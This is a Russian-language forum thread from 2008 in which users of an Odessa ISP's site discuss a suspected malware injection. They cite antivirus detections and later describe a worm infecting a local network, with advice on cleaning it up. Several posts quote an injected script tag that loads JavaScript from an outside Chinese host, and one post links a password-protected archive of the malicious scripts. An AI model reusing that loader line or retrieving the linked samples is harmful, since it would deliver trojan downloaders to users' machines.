Вири на сайте!

 
Начать новую тему   Ответить на тему    Список форумов -> Общак
::  
Автор Сообщение
Phoenix
Новичок


Зарегистрирован: 30.06.2006
Сообщения: 16

СообщениеДобавлено: Сб Июн 28, 2008 12:22 pm    Заголовок сообщения: Вири на сайте! Ответить с цитатой

Началось с сегоднешнего дня, на главной странице Бриза, на фруме и торренте в наглую лезут 2 эксплойта:

Trojan-Downloader.JS.Multi.cn
Exploit.JS.RealPlr.km


на ВирусТотале:
http://www.virustotal.com/ru/analisis/f393bdd2a520f9445a2bed2728f38e3f
http://www.virustotal.com/ru/analisis/03282c58d55bd3ec4b03593052dc03f9
ну и свежак (не палится некоторыми популярными антивирями): http://www.virustotal.com/ru/analisis/755343eecd3bda6e1d82148a1e82ff6c

Заругался Касперыч
ссыль на сами скрипты: http://dump.ru/file_catalog/811781 пасс на архив 123
АХТУНГ! тем кто не понмает о чем идет речь - не качать!

Сидят в ТОРе каждой страницы в виде <script language="javascript" SRC="http://mx.content-type.cn:443/day.js"></script>
Пробежался бегло, мож че-то пропустил... Embarassed

Лечимся, господа Админы, лечимся Very Happy
Посмотреть профиль Отправить личное сообщение
RIKER
Монстр форума


Зарегистрирован: 31.08.2005
Сообщения: 892
Откуда: Из тренажерного

СообщениеДобавлено: Сб Июн 28, 2008 12:27 pm    Заголовок сообщения: Ответить с цитатой

Походу админы тут не причем, мой каспер молчит похоже это ты вирь хватанул Smile
Посмотреть профиль Отправить личное сообщение Отправить e-mail
Phoenix
Новичок


Зарегистрирован: 30.06.2006
Сообщения: 16

СообщениеДобавлено: Сб Июн 28, 2008 12:34 pm    Заголовок сообщения: Ответить с цитатой

Вроде не параноик, но наличие <script language="javascript" SRC="http://mx.content-type.cn:443/day.js"></script> было на лицо..
Уже нету Shocked
Посмотреть профиль Отправить личное сообщение
Гад
Монстр форума


Зарегистрирован: 16.11.2007
Сообщения: 310

СообщениеДобавлено: Сб Июн 28, 2008 12:35 pm    Заголовок сообщения: Re: Вири на сайте! Ответить с цитатой

Phoenix писал(а):
Сидят в ТОРе каждой страницы в виде <script language="javascript" SRC="http://mx.content-type.cn:443/day.js"></script>[/b]

Не наблюдаю такого у себя. Проверял Оперой и ИЕ6.
Каспер тоже молчит..

_________________
Одесский форум
Посмотреть профиль Отправить личное сообщение
Phoenix
Новичок


Зарегистрирован: 30.06.2006
Сообщения: 16

СообщениеДобавлено: Сб Июн 28, 2008 12:38 pm    Заголовок сообщения: Ответить с цитатой

Laughing снова появилось
Код:
<script language="javascript" SRC="http://mx.content-type.cn:443/day.js"></script>                                                                  <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>БÑ?из.UA :: Кабельное телевидение, кабельный интеÑ?нет</title>

тянул независимым делфевым компонентом, в котором врядли может что-то сидеть...
Посмотреть профиль Отправить личное сообщение
OzoN
Авторитет


Зарегистрирован: 14.06.2005
Сообщения: 1038

СообщениеДобавлено: Сб Июн 28, 2008 2:05 pm    Заголовок сообщения: Ответить с цитатой

Код:
<HTML></HTML>


Evil or Very Mad
Посмотреть профиль Отправить личное сообщение Посетить сайт автора
Glass
Монстр форума


Зарегистрирован: 14.04.2006
Сообщения: 621
Откуда: from the network...

СообщениеДобавлено: Сб Июн 28, 2008 2:16 pm    Заголовок сообщения: Ответить с цитатой

Нет там ничего. Сам лечись вместе со своим каспером.

_________________
Посмотреть профиль Отправить личное сообщение Отправить e-mail Посетить сайт автора MSN Messenger
Kasoi
Монстр форума


Зарегистрирован: 28.05.2007
Сообщения: 418

СообщениеДобавлено: Сб Июн 28, 2008 3:35 pm    Заголовок сообщения: Ответить с цитатой

Код:
<script language="JavaScript" type="text/javascript" src="http://www.briz.ua/main.js"></script>

OMFG !

СРОЧНО ! Я НАШЕЛ ОЧЕНЬ СТРАШНЫЙ ВИРУС !

Код:
<STRONG><A href="http://chat.breezein.net/"><FONT size=2>Чат</FONT></A></STRONG>
Посмотреть профиль Отправить личное сообщение
Mask__
Продвинутый


Зарегистрирован: 12.08.2005
Сообщения: 155

СообщениеДобавлено: Пн Авг 11, 2008 2:26 pm    Заголовок сообщения: Ответить с цитатой

+1 =)))
Посмотреть профиль Отправить личное сообщение Отправить e-mail
Screjet
Админ форума


Зарегистрирован: 02.10.2003
Сообщения: 1213
Откуда: Новый Эдем, Одесса.

СообщениеДобавлено: Пн Авг 11, 2008 3:57 pm    Заголовок сообщения: Ответить с цитатой

Связывайся с техсапом, в подсети завелся вирус, который подписывается всеми узлами на свете (включая сайт бриза).
Посмотреть профиль Отправить личное сообщение
INVINCIBLE
Монстр форума


Зарегистрирован: 27.04.2006
Сообщения: 379
Откуда: Odessa

СообщениеДобавлено: Пт Авг 15, 2008 6:25 pm    Заголовок сообщения: Ответить с цитатой

касперский 6 +Firefox 3 - - - тишинаааааа))))))

_________________
Сейчас Играет В Resident Evil Codename:VERONICA
Посмотреть профиль Отправить личное сообщение AIM Address MSN Messenger
James_Boo
Монстр форума


Зарегистрирован: 26.07.2005
Сообщения: 607

СообщениеДобавлено: Сб Авг 16, 2008 9:35 am    Заголовок сообщения: Ответить с цитатой

Веселы вирус. У меня на работе была с ним проблема месяц назад. Короче, говоря - это червь. Процесс происходит примерно так: на компьютер попадает файл (тело червя), который заражает системные файлы винды. Далее, при каждой сессии, через любой браузер, идет попытка соединиться с некоторыми сайтами, в частности с "content-type" и скачать Trojan-Downloader, ну а дальше все как обычно. Более того зараженный компьютер постоянно пытается соединиться с другими компьютерами в своей подсети. У меня сеть из 28 машин под адресами 192.168.0.хх. Зараженными оказались все машины под ХР, одна машина под 2003 осталась незараженной.

Проблема заключается в том, что если уже заражены системные файлы винды, то ничего вам не поможет. Компьютеры сканировались Касперским, Вебом и Авирой настроенными на самую тщательную проверку и ничего не нашли (Нодом не сканировалось, т.к. именно он стоял на всех компьютерах и пропустил эту заразу).

Единственный способ решения проблемы который я нашел - переустановка винды на всех зараженных компьютерах. При этом во время установки винды компьютер был отключен от сети и включался в сеть только после установки на него Касперского 7 с последними базами. После включения в сеть Касперский ловил червя еще до заражения системных файлов.

_________________
Не можешь скачать, не мучай канал!
Посмотреть профиль Отправить личное сообщение
Santa_Faust
Продвинутый


Зарегистрирован: 02.11.2007
Сообщения: 107

СообщениеДобавлено: Сб Авг 16, 2008 1:17 pm    Заголовок сообщения: Ответить с цитатой

Цитата:
Единственный способ решения проблемы который я нашел - переустановка винды на всех зараженных компьютерах.


Способ не единственный, но самый простой.

После всех касперских, нодов и дээрвэбов прогоните машину AVZ:

http://www.z-oleg.com/secur/avz/
Посмотреть профиль Отправить личное сообщение
Показать сообщения:   
Начать новую тему   Ответить на тему    Список форумов -> Общак
Страница 1 из 1

 
Перейти: